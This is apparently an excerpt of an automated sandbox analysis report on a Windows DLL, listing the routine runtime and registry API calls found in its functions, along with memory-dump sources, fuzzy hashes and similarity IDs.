                                                                                                                                                                                                                    • Instruction ID: 6ab668121dbdf2b3b6ac7f3729d17843ad2f62bf30b44de2910faaf40f26d668
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2670f0bac4c8b857af1928316a3b0a4dd4f9a47f73ce1540746033e36f97c6d4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B74139B1904609AFDB20CF99C884A9FBBF5FF49310F10865DE956A76A0D731A914CF90
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(Advapi32.dll,819F5D14), ref: 6F20D504
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6F20D51B
                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,00000000,819F5D14), ref: 6F20D550
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 6F20D563
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressCloseHandleModuleOpenProc
                                                                                                                                                                                                                    • String ID: Advapi32.dll$RegOpenKeyTransactedW
                                                                                                                                                                                                                    • API String ID: 823179699-3913318428
                                                                                                                                                                                                                    • Opcode ID: 80c947b9a024cba473283ea1badf3492dc12f2c30409ea9ceb364778e15c13a7
                                                                                                                                                                                                                    • Instruction ID: a935767db292d1000718dbe8439f0ded5d6bac909aedc2f1afee0d923c4b946f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80c947b9a024cba473283ea1badf3492dc12f2c30409ea9ceb364778e15c13a7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F431B4B2A0460AAFDB10DF59C844BAABBBAFB45315F504129EC15A7280DB70E910CEA0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6F215983
                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6F21598D
                                                                                                                                                                                                                      • Part of subcall function 6F202140: std::_Lockit::_Lockit.LIBCPMT ref: 6F20215D
                                                                                                                                                                                                                      • Part of subcall function 6F202140: std::_Lockit::~_Lockit.LIBCPMT ref: 6F202179
                                                                                                                                                                                                                    • codecvt.LIBCPMT ref: 6F2159C7
                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 6F2159DE
                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6F2159FE
                                                                                                                                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 6F215A0B
                                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6F215A18
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registercodecvt
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 614290800-0
                                                                                                                                                                                                                    • Opcode ID: 037ab6897d88cf2e3dd719e8d03b10f351d0cc8bfa9533c255ef994dd80387e0
                                                                                                                                                                                                                    • Instruction ID: 6f15ed598306b00c557b1a6bac6ae7cf7b206c49ffac26ea5c5f1282d606efc8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 037ab6897d88cf2e3dd719e8d03b10f351d0cc8bfa9533c255ef994dd80387e0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41318DB690072E8FCB14DF68C484AAEBBF1BF49714F10455EE5559BB80CB71AA04CF94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6F207B7E
                                                                                                                                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6F207B8C
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6F207BA1
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F207BAC
                                                                                                                                                                                                                    • VarBstrCmp.OLEAUT32(?,00000000,00000400,00000000), ref: 6F207BCB
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 6F207BD8
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32 ref: 6F207C02
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: String$Free$ByteCharMultiWide$AllocBstr
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1801994256-0
                                                                                                                                                                                                                    • Opcode ID: 63c233bd330f1d39cf4a63096837c82675e07446e0caa775a34e55639f166fe2
                                                                                                                                                                                                                    • Instruction ID: 9a4f209552f1356d1c030f73993e2705dc23c23754e99ddbb36cbcd08ec46a2b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63c233bd330f1d39cf4a63096837c82675e07446e0caa775a34e55639f166fe2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69114C7364471EBBDB2017148C5DFCA7B29DB43B31F200345FA21B66C4CAB0A820CDA0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                    • API String ID: 0-537541572
                                                                                                                                                                                                                    • Opcode ID: 397555453127c3d17c970b45381af9000feab37ebdb15527d3afbd0bfedde433
                                                                                                                                                                                                                    • Instruction ID: e18856d2058f5f3151b2d40b40ad18bf3fb24503fb36378e1e1529541042eebc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 397555453127c3d17c970b45381af9000feab37ebdb15527d3afbd0bfedde433
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5321DBB29C962EABDB2156388DC4E4A77E9DF06F71F100A11ED15AB280DB74ED10CDE1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F232DF2: _free.LIBCMT ref: 6F232E17
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2330F6
                                                                                                                                                                                                                      • Part of subcall function 6F227F62: HeapFree.KERNEL32(00000000,00000000,?,6F232E1C,?,00000000,?,00000000,?,6F2330C1,?,00000007,?,?,6F2310B4,?), ref: 6F227F78
                                                                                                                                                                                                                      • Part of subcall function 6F227F62: GetLastError.KERNEL32(?,?,6F232E1C,?,00000000,?,00000000,?,6F2330C1,?,00000007,?,?,6F2310B4,?,?), ref: 6F227F8A
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F233101
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F23310C
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F233160
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F23316B
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F233176
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F233181
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                    • Opcode ID: 4ae2c02a372ded23fb346e1d660c87c497e2450403bcf5bb002bd5bdac4a6360
                                                                                                                                                                                                                    • Instruction ID: 9f78cc1274df298ac9de1c76d220b7b11048d86d0e16b571618408d9cbcd630d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ae2c02a372ded23fb346e1d660c87c497e2450403bcf5bb002bd5bdac4a6360
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D1124F2949B2CB7D520EBB0CC09FCB77DC9F14704F404C15A2AA665D0DB65B9065FA4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6F21C72E,6F21C72E,?,?,?,6F22D90E,00000001,00000001,7BE85006), ref: 6F22D74E
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,00000000,?,?,?,6F22D90E,00000001,00000001,7BE85006,?,?,?), ref: 6F22D7B7
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,7BE85006,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 6F22D897
                                                                                                                                                                                                                    • __freea.LIBCMT ref: 6F22D8A4
                                                                                                                                                                                                                      • Part of subcall function 6F227F9C: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F217DD3,00000105,000000FF,24448D6F,00000000,?,6F201817,?,00000103,000000FF), ref: 6F227FCE
                                                                                                                                                                                                                    • __freea.LIBCMT ref: 6F22D8AD
                                                                                                                                                                                                                    • __freea.LIBCMT ref: 6F22D8D2
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1414292761-0
                                                                                                                                                                                                                    • Opcode ID: 38b0aa11e472feeb06f47bb436bec38cb0d21dc4f75f035400dd4c49bba51cd9
                                                                                                                                                                                                                    • Instruction ID: 72555477f13fb11e2bdd721349dc7ab311b363e3e7a94286010959fc3bfe9241
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38b0aa11e472feeb06f47bb436bec38cb0d21dc4f75f035400dd4c49bba51cd9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1151917260421EAFEB119F64CC84EAB3BEAEF85761F510129FD1497680D774EC118EA2
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 6F216CC8
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 6F216D33
                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32 ref: 6F216D50
                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32 ref: 6F216D8F
                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32 ref: 6F216DEE
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6F216E11
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiStringWide
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2829165498-0
                                                                                                                                                                                                                    • Opcode ID: bfded5ee67fe5d39e77fef1d675c3b2f49fac0212c0b03c9b4afbe334af10c7d
                                                                                                                                                                                                                    • Instruction ID: de7a1e23589a3a048703c9f1c1790d2bcafc7813ca7b6913956bf8da986923e1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfded5ee67fe5d39e77fef1d675c3b2f49fac0212c0b03c9b4afbe334af10c7d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38518FB251421EABEF108FA4CC84FAF3FEAEB46751F114529EA2496190D731D920CE64
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CharNextW.USER32(?,00000000,00000000,?,C000008C,00000001), ref: 6F20DF2E
                                                                                                                                                                                                                    • CharNextW.USER32(00000000,?,00000000,00000000), ref: 6F20DF5B
                                                                                                                                                                                                                    • CharNextW.USER32(770CEEF0,?,00000000,00000000), ref: 6F20DF74
                                                                                                                                                                                                                    • CharNextW.USER32(770CEEF0,?,00000000,00000000), ref: 6F20DF7F
                                                                                                                                                                                                                    • CharNextW.USER32(00000001,?,00000000,00000000), ref: 6F20DFEE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CharNext
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3213498283-0
                                                                                                                                                                                                                    • Opcode ID: 3c22efb0f9b466a104946ad8c12ca68fb799a01c0302977d50ccf34b9edc8583
                                                                                                                                                                                                                    • Instruction ID: e9344cafaca892cb0b2c5823bfce5217227f4ec72f9ad71895e39a3a2964ba2f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3c22efb0f9b466a104946ad8c12ca68fb799a01c0302977d50ccf34b9edc8583
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C041F73760051ACFCB10EF28C4846A9B7F3EF99321B948566E844DB358EB31A991CF94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6F204819
                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6F20483B
                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6F20485B
                                                                                                                                                                                                                    • __Getctype.LIBCPMT ref: 6F2048F1
                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 6F204910
                                                                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6F204928
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1102183713-0
                                                                                                                                                                                                                    • Opcode ID: 8b3914d39db678feb382f0a3e7066b842f2d17fccc670cbb250e71c862d27e29
                                                                                                                                                                                                                    • Instruction ID: 8403ac3ba4ad9803f0e642850c3c8e243c982f6c3cf10b461f55c05aaa4f1397
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b3914d39db678feb382f0a3e7066b842f2d17fccc670cbb250e71c862d27e29
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B841AD72D0475D9BCB10EF58C840AAAB7F4FF19724F1481ADD805AB681EB31A948CFD1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F20D4B0: GetModuleHandleW.KERNEL32(Advapi32.dll,819F5D14), ref: 6F20D504
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 6F20D602
                                                                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 6F20D64A
                                                                                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 6F20D683
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 6F20D698
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 6F20D6C0
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 6F20D6E8
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Close$Enum$HandleModule
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2852649468-0
                                                                                                                                                                                                                    • Opcode ID: 9b263727bbd845abc2a80931ca5dce8135c9ff50aa0efa9b2f5c0da1bdfdc813
                                                                                                                                                                                                                    • Instruction ID: 7937a8835bc55d919ace2566f5a47210dbb380e577947733ecfd5379ae751035
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b263727bbd845abc2a80931ca5dce8135c9ff50aa0efa9b2f5c0da1bdfdc813
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14419FB26093055BD710EF55E844B6BB7E9EF88315F40492EF998D7280DB30E904CFA6
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(6F200000,?,00000104), ref: 6F20F65C
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6F20F814
                                                                                                                                                                                                                      • Part of subcall function 6F207AE0: RaiseException.KERNEL32(?,?,00000000,00000000), ref: 6F207AED
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Module$ExceptionFileHandleNameRaise
                                                                                                                                                                                                                    • String ID: Module$Module_Raw$REGISTRY
                                                                                                                                                                                                                    • API String ID: 1728487212-549000027
                                                                                                                                                                                                                    • Opcode ID: 816a505003b97f38fddde61e8717e506bf1f659d8865cee001a92fcb0a4a2a7d
                                                                                                                                                                                                                    • Instruction ID: 39905ee90a3de894e71677a02817e565603e3aec72f10d4b3801a536abd377a7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 816a505003b97f38fddde61e8717e506bf1f659d8865cee001a92fcb0a4a2a7d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17D16076A4172D8BDB28EB24DC50B9F73B4FF45305F0001A9D91EA7A40EB75AA84CF46
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000001,?,6F2180DC,6F2141B6,6F214839,?,6F214A71,?,00000001,?,?,00000001,?,6F2486F8,0000000C,6F214B6A), ref: 6F2199FA
                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F219A08
                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F219A21
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,6F214A71,?,00000001,?,?,00000001,?,6F2486F8,0000000C,6F214B6A,?,00000001,?), ref: 6F219A73
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                    • Opcode ID: de7f8ae571875f262c1df79b2b06a7502aec08b83cd7b6b23b14a6d994c2495c
                                                                                                                                                                                                                    • Instruction ID: 77426390e911217c5c6d92875f8f433e30ac70a9f8afea40bfc60f89018f6ce3
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de7f8ae571875f262c1df79b2b06a7502aec08b83cd7b6b23b14a6d994c2495c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F01F53221E71A5FEB14A5749C8C74B3BE9DF02BBA720132AE720498D4FF91482D8D48
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F20AEB0: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,819F5D14,?), ref: 6F20ACF7
                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,edit,?,00000000,00000000,00000001), ref: 6F2105E8
                                                                                                                                                                                                                    • PdhRemoveCounter.PDH(?,?,00000000), ref: 6F210683
                                                                                                                                                                                                                    • PdhCloseQuery.PDH(?,?,00000000), ref: 6F210698
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseCounterExecuteFolderPathQueryRemoveShell
                                                                                                                                                                                                                    • String ID: 0$edit
                                                                                                                                                                                                                    • API String ID: 2809573910-562573004
                                                                                                                                                                                                                    • Opcode ID: eb92043aa1a3b828ebaf00ddf43ae9e1e7e92eac000a1fb9d15fba986eb88b60
                                                                                                                                                                                                                    • Instruction ID: 517d414f27ff833d4d0496cd9f3fa129541832e2c17b9dce8697a682f2e84b2b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb92043aa1a3b828ebaf00ddf43ae9e1e7e92eac000a1fb9d15fba986eb88b60
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FE9100726083098FD704DF28C880B9AB7E5BF85318F10461DEA949B690D732F9A4CFD6
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                    • String ID: *?$.
                                                                                                                                                                                                                    • API String ID: 269201875-3972193922
                                                                                                                                                                                                                    • Opcode ID: 31cf4a464588e9662cbe7de42673691b9a0f35b521f8d931fa172eff98d6277e
                                                                                                                                                                                                                    • Instruction ID: 7eaa9728e2402e11ee1f0cc473c7d6f94e356984478eac25e6d67d094ceeb562
